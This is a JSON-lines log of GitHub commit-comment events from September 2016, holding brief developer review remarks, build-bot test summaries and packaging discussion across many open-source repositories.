{"id":"4584990765","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082819,"position":72,"line":72,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:17:30Z","updated_at":"2016-09-19T18:17:30Z","body":"объявление len в современных браузерах лишнее, они сами выносят это из цикла"}},"created_at":"2016-09-19T18:17:30Z"}
{"id":"4584990858","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19082820,"position":25,"line":131,"path":"flixel/system/debug/watch/EditableTextField.hx","commit_id":"5702c9264ea274df8716b3ace5cc5df85191de78","created_at":"2016-09-19T18:17:31Z","updated_at":"2016-09-19T18:17:31Z","body":"`wrap()` I mean."}},"created_at":"2016-09-19T18:17:31Z"}
{"id":"4584991417","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19082822,"position":23,"line":22,"path":"index.html","commit_id":"5886c2c518ed88809711fea960f4150453228fd3","created_at":"2016-09-19T18:17:38Z","updated_at":"2016-09-19T18:17:38Z","body":"I updated the avatar with a higher resolution picture. It was 200x200 and now it is 300x300."}},"created_at":"2016-09-19T18:17:38Z"}
{"id":"4584997243","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082838,"position":155,"line":155,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:18:35Z","updated_at":"2016-09-19T18:18:35Z","body":"подразумевалось, что вы измените массив, а не создадите новый"}},"created_at":"2016-09-19T18:18:35Z"}
{"id":"4584997975","type":"CommitCommentEvent","actor":{"login":"curiouscrusher"},"repo":{"name":"Gauge-Design/newproject"},"payload":{"comment":{"id":19082841,"position":null,"line":null,"path":null,"commit_id":"0f2c12a3cfc4d6bf26d20e1bbecbd90f88c9d61c","created_at":"2016-09-19T18:18:43Z","updated_at":"2016-09-19T18:18:43Z","body":"#1 Make more fix"}},"created_at":"2016-09-19T18:18:43Z"}
{"id":"4585004990","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082854,"position":166,"line":166,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:19:53Z","updated_at":"2016-09-19T18:19:53Z","body":"почитай про  Date.prototype.setDate"}},"created_at":"2016-09-19T18:19:53Z"}
{"id":"4585009750","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082865,"position":178,"line":178,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:20:43Z","updated_at":"2016-09-19T18:20:43Z","body":"увидел - первое решение тогда зачем?"}},"created_at":"2016-09-19T18:20:43Z"}
{"id":"4585012347","type":"CommitCommentEvent","actor":{"login":"fvanderbiest"},"repo":{"name":"geobretagne/mdchecker"},"payload":{"comment":{"id":19082874,"position":17,"line":15,"path":"app/create_db.py","commit_id":"cfd31babe54dc59215dde21c9dd4790b2a13d3d1","created_at":"2016-09-19T18:21:10Z","updated_at":"2016-09-19T18:21:10Z","body":"commented out ?"}},"created_at":"2016-09-19T18:21:10Z"}
{"id":"4585014612","type":"CommitCommentEvent","actor":{"login":"posener"},"repo":{"name":"posener/mock-import"},"payload":{"comment":{"id":19082882,"position":null,"line":null,"path":null,"commit_id":"bd6077985581a98f3c7ce6fad30cc60d8b27d6e8","created_at":"2016-09-19T18:21:33Z","updated_at":"2016-09-19T18:21:33Z","body":"Nice, thanks!!\r\nCan you please reopen this pull request?\r\nI had the automated build disabled for pullrequests.\r\nIt is now fixed, I hope."}},"created_at":"2016-09-19T18:21:33Z"}
{"id":"4585016688","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082884,"position":5,"line":35,"path":"src/BenchmarkDotNet.Core/Exporters/RPlotExporter.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:21:51Z","updated_at":"2016-09-19T18:21:51Z","body":"silent upgrade ;) is there a note about the specific version in docs?"}},"created_at":"2016-09-19T18:21:51Z"}
{"id":"4585019509","type":"CommitCommentEvent","actor":{"login":"BrianHawley"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":19082891,"position":30,"line":98,"path":"rb/lib/selenium/webdriver/chrome/bridge.rb","commit_id":"6d52426596e4af61c51264227deffc5fbf9f635f","created_at":"2016-09-19T18:22:19Z","updated_at":"2016-09-19T18:22:19Z","body":"Are you sure that `args.key?(:whitelisted_ips)` is what you should be checking for these two?"}},"created_at":"2016-09-19T18:22:19Z"}
{"id":"4585021392","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19082893,"position":null,"line":null,"path":null,"commit_id":"94405c33b6f81a16da881032978ce92480e9dab2","created_at":"2016-09-19T18:22:38Z","updated_at":"2016-09-19T18:22:38Z","body":"++"}},"created_at":"2016-09-19T18:22:38Z"}
{"id":"4585023456","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19082900,"position":null,"line":null,"path":null,"commit_id":"bd56033e1832cd071dedaf30d5a7d25f145eb0c4","created_at":"2016-09-19T18:22:59Z","updated_at":"2016-09-19T18:22:59Z","body":"@jfoug Yes, this fixed the hang.\r\nMay be use `warn_exit(\"unexpected end of file.\");` as in other places, e.g., with an empty file?"}},"created_at":"2016-09-19T18:22:59Z"}
{"id":"4585024762","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":19082906,"position":null,"line":null,"path":null,"commit_id":"f95c76214d682bc6df33b7ffdb2c8b9d413d5b27","created_at":"2016-09-19T18:23:13Z","updated_at":"2016-09-19T18:23:13Z","body":"@ssmusoke can i look at your velocity expression that is getting broken by this?"}},"created_at":"2016-09-19T18:23:13Z"}
{"id":"4585029373","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/plinko-probability"},"payload":{"comment":{"id":19082920,"position":null,"line":null,"path":null,"commit_id":"4917d74854b5de59e9ab867fcb3a859fdc833809","created_at":"2016-09-19T18:24:00Z","updated_at":"2016-09-19T18:24:00Z","body":"#71"}},"created_at":"2016-09-19T18:24:00Z"}
{"id":"4585032225","type":"CommitCommentEvent","actor":{"login":"Gravatronics"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19082926,"position":null,"line":null,"path":null,"commit_id":"3af41bf3779e81725265a1bc78b9a6a3bd640b67","created_at":"2016-09-19T18:24:31Z","updated_at":"2016-09-19T18:24:31Z","body":"The removal of this class has no effect whatsoever."}},"created_at":"2016-09-19T18:24:31Z"}
{"id":"4585032330","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19082928,"position":null,"line":null,"path":null,"commit_id":"c520bf73a35d9528c6b912476a969eace593b3a1","created_at":"2016-09-19T18:24:32Z","updated_at":"2016-09-19T18:24:32Z","body":"Hi Philip, i have modified the firefox-kde lang pack , seebthe conflicts and change in replaces and not work only with conflicts but at the same time conflicts and replaces no... i can check later... is not a big problem, yesterday build `light` langpack but is better reflect the other langpack name . I think few user install the first pkg :p "}},"created_at":"2016-09-19T18:24:32Z"}
{"id":"4585032969","type":"CommitCommentEvent","actor":{"login":"Cronus89"},"repo":{"name":"InvoicePlane/InvoicePlane"},"payload":{"comment":{"id":19082931,"position":null,"line":null,"path":null,"commit_id":"6c1cb132dd57cba31907c163c46293be16021876","created_at":"2016-09-19T18:24:39Z","updated_at":"2016-09-19T18:24:39Z","body":"I just upgraded to 1.4.8 and this broke IIS, it adds the complete filesystem path to the url i.e. /c/inetpub/ etc etc."}},"created_at":"2016-09-19T18:24:39Z"}
{"id":"4585034131","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19082933,"position":null,"line":null,"path":null,"commit_id":"14ff2ca7208aec23c4439846690fafdbb7999d75","created_at":"2016-09-19T18:24:50Z","updated_at":"2016-09-19T18:24:50Z","body":"![screenshot005](https://cloud.githubusercontent.com/assets/6500800/18643838/ab74faf0-7e5b-11e6-84f4-6ec043b029a0.jpg)\r\n"}},"created_at":"2016-09-19T18:24:50Z"}
{"id":"4585035221","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19082934,"position":null,"line":null,"path":null,"commit_id":"191784433813dd098879f8218cb9a804f77d545e","created_at":"2016-09-19T18:25:01Z","updated_at":"2016-09-19T18:25:01Z","body":"As we had recently discovered, yaml should be valid, or something may not work, as it was the case with welcome, where requirement check relies on valid yaml"}},"created_at":"2016-09-19T18:25:01Z"}
{"id":"4585036081","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"torch/nn"},"payload":{"comment":{"id":19082938,"position":null,"line":null,"path":null,"commit_id":"0594d54443b22c43bd8b5e9e5fcc80361f6e923a","created_at":"2016-09-19T18:25:11Z","updated_at":"2016-09-19T18:25:11Z","body":"What is this? Why has documentation been removed???\r\n`optim` is another package, `StochasticGradient` belongs to `nn` and now it is undocumented!"}},"created_at":"2016-09-19T18:25:11Z"}
{"id":"4585036584","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082939,"position":30,"line":30,"path":"src/BenchmarkDotNet.Core/Helpers/SourceCodeHelper.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:25:16Z","updated_at":"2016-09-19T18:25:16Z","body":"why a call to `System.Activator.CreateInstance`? I know it's really expensive. Maybe `default(value.GetType().GetCorrectTypeName())` would be better?"}},"created_at":"2016-09-19T18:25:16Z"}
{"id":"4585036725","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19082940,"position":null,"line":null,"path":null,"commit_id":"3130eb85258c6626113e464edc50d7d9aaee54fa","created_at":"2016-09-19T18:25:17Z","updated_at":"2016-09-19T18:25:17Z","body":"Both Nerub'ar Victim and Cenarion Hold Infantry have that flag, sniffed. None of them lose it by entering combat.\r\nthe first one is a cocoon like mob which is not supposed to do anything or respond to any sort of aggro (but be attackable and killable). the work that I have done here achieves this rather well.\r\nthe second one is a neutral city guard, the only neutral city guard of vanilla that I know of, who will not help you out against mobs, who YOU cannot initiate combat with (as you cannot put yourself at war with cenarion hold, you have to attack opposite faction). their only function is to help flight masters and victims of pvp. The work that I have done here pretty much prevents this, and proves that how we see the passive flag, is not how it works.\r\n\r\nSo here we are.."}},"created_at":"2016-09-19T18:25:17Z"}
{"id":"4585038689","type":"CommitCommentEvent","actor":{"login":"GaldinoFSneto"},"repo":{"name":"ClayFlannigan/Balanbot"},"payload":{"comment":{"id":19082947,"position":null,"line":null,"path":null,"commit_id":"6742a714058eb25f7da6c12d231855c4cbaf9f3a","created_at":"2016-09-19T18:25:37Z","updated_at":"2016-09-19T18:25:37Z","body":"Hello , I bought a full balnbot , and is not worked , since I downloaded but I'm not getting confirurar to use my futaba remote 18MZ , you guys can help me set up the Arduino and the balance shield ?\r\n\r\nMy name is and I am Galdino in Brazil."}},"created_at":"2016-09-19T18:25:37Z"}
{"id":"4585041332","type":"CommitCommentEvent","actor":{"login":"JuarezLustosa"},"repo":{"name":"JuarezLustosa/config-ambiente-linux-influunt"},"payload":{"comment":{"id":19082958,"position":null,"line":null,"path":null,"commit_id":"a892d8ee4c2643f606462ef7edb58c55a0ba12b7","created_at":"2016-09-19T18:26:05Z","updated_at":"2016-09-19T18:26:05Z","body":":+1:"}},"created_at":"2016-09-19T18:26:05Z"}
{"id":"4585041602","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19082959,"position":null,"line":null,"path":null,"commit_id":"d870b343701f3d56738e015973489e1e9b4a6585","created_at":"2016-09-19T18:26:09Z","updated_at":"2016-09-19T18:26:09Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2310 of 2474 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d870b343701f3d56738e015973489e1e9b4a6585-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d870b343701f3d56738e015973489e1e9b4a6585-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.37%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T18:26:09Z"}
{"id":"4585042038","type":"CommitCommentEvent","actor":{"login":"acburdine"},"repo":{"name":"TryGhost/Ghost-CLI"},"payload":{"comment":{"id":19082961,"position":null,"line":null,"path":null,"commit_id":"e1f97b58445cdfc205040535605809cba690283a","created_at":"2016-09-19T18:26:13Z","updated_at":"2016-09-19T18:26:13Z","body":"I done goofed up my local install 😁 "}},"created_at":"2016-09-19T18:26:13Z"}
{"id":"4585044314","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19082965,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-19T18:26:37Z","updated_at":"2016-09-19T18:26:37Z","body":"ASIHPValidation (mjwitte) - x86_64-MacOS-10.9-clang: OK (2331 of 2332 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T18:26:37Z"}
{"id":"4585044905","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082969,"position":3,"line":3,"path":"src/BenchmarkDotNet.Core/Horology/Frequency.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:26:44Z","updated_at":"2016-09-19T18:26:44Z","body":"replacing primitive type with a smart one 👍 "}},"created_at":"2016-09-19T18:26:44Z"}
{"id":"4585046901","type":"CommitCommentEvent","actor":{"login":"ilmarermus"},"repo":{"name":"ilmarermus/homepage"},"payload":{"comment":{"id":19082974,"position":null,"line":null,"path":null,"commit_id":"ea1c1ac9d78c36a023228f29ee4f2b4101a4b3aa","created_at":"2016-09-19T18:27:05Z","updated_at":"2016-09-19T18:27:05Z","body":"sobib"}},"created_at":"2016-09-19T18:27:05Z"}
{"id":"4585048071","type":"CommitCommentEvent","actor":{"login":"karenc"},"repo":{"name":"Connexions/cnx-archive"},"payload":{"comment":{"id":19082975,"position":5,"line":152,"path":"cnxarchive/sql/schema/functions.sql","commit_id":"93a62308fe301ed26f431145c2db0958052cdf7a","created_at":"2016-09-19T18:27:17Z","updated_at":"2016-09-19T18:27:17Z","body":"Is `version` a bit too generic? Should we call it `module_version` instead?"}},"created_at":"2016-09-19T18:27:17Z"}
{"id":"4585050284","type":"CommitCommentEvent","actor":{"login":"saurabh500"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19082981,"position":10,"line":108,"path":"src/System.Data.SqlClient/tests/ManualTests/SQL/TcpDefaultForAzureTest/TcpDefaultForAzureTest.cs","commit_id":"5c9cff71394e5e17fd76f95bae5b5b49b47c0096","created_at":"2016-09-19T18:27:40Z","updated_at":"2016-09-19T18:27:40Z","body":"Why did you add this? \r\n"}},"created_at":"2016-09-19T18:27:40Z"}
{"id":"4585055999","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19082992,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T18:28:40Z","updated_at":"2016-09-19T18:28:40Z","body":"The problem lies how we are importing the source to launchpad and it gets converted to bazaar branch. By default the label \"changes\" in makefile shouldn't get executed in launchpad. But it was doing so because we were overwriting default behavior. But now I fixed it.\r\n\r\nThis is I, think, one of drawback of debian packaging, it can not just take the source and compile on the fly."}},"created_at":"2016-09-19T18:28:40Z"}
{"id":"4585056395","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19082995,"position":null,"line":null,"path":null,"commit_id":"06a474de427a81c542163002efe6f7bcd228546c","created_at":"2016-09-19T18:28:44Z","updated_at":"2016-09-19T18:28:44Z","body":"Good work, cybrann."}},"created_at":"2016-09-19T18:28:44Z"}
{"id":"4585062344","type":"CommitCommentEvent","actor":{"login":"reedstrm"},"repo":{"name":"Connexions/cnx-archive"},"payload":{"comment":{"id":19083004,"position":5,"line":152,"path":"cnxarchive/sql/schema/functions.sql","commit_id":"93a62308fe301ed26f431145c2db0958052cdf7a","created_at":"2016-09-19T18:29:49Z","updated_at":"2016-09-19T18:29:49Z","body":"Yeah, probably. Esp. since it just encapsulates the concat_ws call. BTW, it's needed to create the functional index, which is needed to get the performance of the 'check of cooked' call down in the submillisecond range. I'll fix."}},"created_at":"2016-09-19T18:29:49Z"}
{"id":"4585068927","type":"CommitCommentEvent","actor":{"login":"ssmusoke"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":19083018,"position":null,"line":null,"path":null,"commit_id":"f95c76214d682bc6df33b7ffdb2c8b9d413d5b27","created_at":"2016-09-19T18:30:59Z","updated_at":"2016-09-19T18:30:59Z","body":" <ifMode mode=\"EDIT\" include=\"false\">\r\n        <lookup complexExpression=\"\r\n            #set( $encounter = 0 )\r\n            #set( $encounter = $fn.latestEncounter('8d5b27bc-c2cc-11de-8d13-0010c6dffd0f'))\r\n            #if( $encounter != 0 )\r\n                &lt;script type=&quot;text/javascript&quot;>\r\n                        if (window.location.href.indexOf('/module/htmlformentry/htmlForm.form') == -1) {\r\n                            window.location.href = window.location.protocol + &quot;//&quot; + window.location.host + &quot;/&quot;+ OPENMRS_CONTEXT_PATH + &quot;/htmlformentryui/htmlform/editHtmlFormWithStandardUi.page?patientId=$encounter.patientId&amp;visitId=$encounter.visit.visitId&amp;formUuid=52653a60-8300-4c13-be4d-4b746da06fee&amp;encounterId=$encounter.encounterId&amp;returnUrl=%2F&quot; + OPENMRS_CONTEXT_PATH + &quot;%2Fcoreapps%2Fclinicianfacing%2Fpatient.page%3FpatientId%3D$encounter.patientId&quot;;\r\n                        }\r\n                &lt;/script>\r\n            #end\"/>\r\n    </ifMode>"}},"created_at":"2016-09-19T18:30:59Z"}
{"id":"4585071981","type":"CommitCommentEvent","actor":{"login":"51MPL3"},"repo":{"name":"Ju5tEgoist/JuJa-Projects"},"payload":{"comment":{"id":19083027,"position":30,"line":30,"path":"juja-core/src/ua/com/juja/core/Lab37.java","commit_id":"23f330b8bd930804788c1b1321b112bc50aa5e29","created_at":"2016-09-19T18:31:30Z","updated_at":"2016-09-19T18:31:30Z","body":"remove this"}},"created_at":"2016-09-19T18:31:30Z"}
{"id":"4585073079","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":19083032,"position":null,"line":null,"path":null,"commit_id":"6db2dd5b6e99e1996d38315716c032dc652ddc8a","created_at":"2016-09-19T18:31:42Z","updated_at":"2016-09-19T18:31:42Z","body":"is this commit related to something else ? i get a full logcat spam after that commit \r\nsomething is trying to access the /system/etc/izat.conf even we declared here that this file doesnt exist"}},"created_at":"2016-09-19T18:31:42Z"}
{"id":"4585073531","type":"CommitCommentEvent","actor":{"login":"51MPL3"},"repo":{"name":"Ju5tEgoist/JuJa-Projects"},"payload":{"comment":{"id":19083034,"position":33,"line":33,"path":"juja-core/src/ua/com/juja/core/Lab37.java","commit_id":"23f330b8bd930804788c1b1321b112bc50aa5e29","created_at":"2016-09-19T18:31:47Z","updated_at":"2016-09-19T18:31:47Z","body":"... and this"}},"created_at":"2016-09-19T18:31:47Z"}
{"id":"4585074883","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083041,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T18:32:03Z","updated_at":"2016-09-19T18:32:03Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2365 of 2370 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T18:32:03Z"}
{"id":"4585075519","type":"CommitCommentEvent","actor":{"login":"brodee"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19083042,"position":null,"line":null,"path":null,"commit_id":"dba0f14591d3747684a9b2aa30b4edf8a3192cfc","created_at":"2016-09-19T18:32:10Z","updated_at":"2016-09-19T18:32:10Z","body":"Crap! Sorry, didn't pull everything. I have to fix this when I get home unfortunately."}},"created_at":"2016-09-19T18:32:10Z"}
{"id":"4585076177","type":"CommitCommentEvent","actor":{"login":"jackyphuong"},"repo":{"name":"jackyphuong/coretracking"},"payload":{"comment":{"id":19083043,"position":null,"line":null,"path":null,"commit_id":"bfde30543f0d8539ded377fc1d1795db20627401","created_at":"2016-09-19T18:32:16Z","updated_at":"2016-09-19T18:32:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8Qa7RQc4&#x2F;4-apply-validation-into-pages\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Apply validation into pages</a>"}},"created_at":"2016-09-19T18:32:16Z"}
{"id":"4585076884","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"BukkitPlaysMC/PrivateVaults"},"payload":{"comment":{"id":19083044,"position":null,"line":null,"path":null,"commit_id":"1c99b21108d9c1ded8fcd11a7ddcaf5141a59d82","created_at":"2016-09-19T18:32:23Z","updated_at":"2016-09-19T18:32:23Z","body":"XD"}},"created_at":"2016-09-19T18:32:23Z"}
{"id":"4585077829","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19083046,"position":9,"line":6,"path":"src/BenchmarkDotNet.Core/Jobs/Job.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T18:32:33Z","updated_at":"2016-09-19T18:32:33Z","body":"👍 for removing `IJob` and making `Job` sealed"}},"created_at":"2016-09-19T18:32:33Z"}
{"id":"4585082292","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19083061,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T18:33:20Z","updated_at":"2016-09-19T18:33:20Z","body":"ASIHPValidation (shenb) - i386-Windows-7-VisualStudio-12: OK (2331 of 2336 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T18:33:20Z"}
{"id":"4585084763","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"smuwanga/openmrs-module-ugandaemr-fingerprint"},"payload":{"comment":{"id":19083068,"position":5,"line":14,"path":"api/src/main/java/org/openmrs/module/ugandaemr/fingerprint/UgandaEMRFingerPrintActivator.java","commit_id":"d84d606a3a5cb16d1b1d1c4fcafae5c4328c168d","created_at":"2016-09-19T18:33:46Z","updated_at":"2016-09-19T18:33:46Z","body":"looks like you have renamed this and that's why you are getting view provider not found for fingerprint"}},"created_at":"2016-09-19T18:33:46Z"}
{"id":"4585092339","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"smuwanga/openmrs-module-ugandaemr-fingerprint"},"payload":{"comment":{"id":19083080,"position":13,"line":13,"path":"omod/src/main/resources/apps/findpatientfingerprint_app.json","commit_id":"d84d606a3a5cb16d1b1d1c4fcafae5c4328c168d","created_at":"2016-09-19T18:35:04Z","updated_at":"2016-09-19T18:35:04Z","body":"the first part of this url should use your new view provider called ugandaemr instead of fingerprint since it looks like you renamed this"}},"created_at":"2016-09-19T18:35:04Z"}
{"id":"4585092666","type":"CommitCommentEvent","actor":{"login":"51MPL3"},"repo":{"name":"Ju5tEgoist/JuJa-Projects"},"payload":{"comment":{"id":19083081,"position":38,"line":38,"path":"juja-core/src/ua/com/juja/core/Lab37.java","commit_id":"23f330b8bd930804788c1b1321b112bc50aa5e29","created_at":"2016-09-19T18:35:09Z","updated_at":"2016-09-19T18:35:09Z","body":"This check is redundant"}},"created_at":"2016-09-19T18:35:09Z"}
{"id":"4585094355","type":"CommitCommentEvent","actor":{"login":"51MPL3"},"repo":{"name":"Ju5tEgoist/JuJa-Projects"},"payload":{"comment":{"id":19083084,"position":37,"line":37,"path":"juja-core/src/ua/com/juja/core/Lab37.java","commit_id":"23f330b8bd930804788c1b1321b112bc50aa5e29","created_at":"2016-09-19T18:35:25Z","updated_at":"2016-09-19T18:35:25Z","body":"This check is redundant"}},"created_at":"2016-09-19T18:35:25Z"}
{"id":"4585097156","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19083089,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T18:35:54Z","updated_at":"2016-09-19T18:35:54Z","body":"Hmm..I think in this case its a matter of lack of documented functionality in launchpad more so than its is how debian packaging works :unamused: I've seen several cases where Ubuntu is doing things with github sources on launchpad that don't appear to be possible for the public launchpad users to do (or if its possible its not documented ANYWHERE). Its frustrating to say the least. "}},"created_at":"2016-09-19T18:35:54Z"}
{"id":"4585098722","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19083093,"position":null,"line":null,"path":null,"commit_id":"1a1464a40a5b7f1d5d6e93ccfc04e99d4bf5e71b","created_at":"2016-09-19T18:36:12Z","updated_at":"2016-09-19T18:36:12Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=72)"}},"created_at":"2016-09-19T18:36:12Z"}
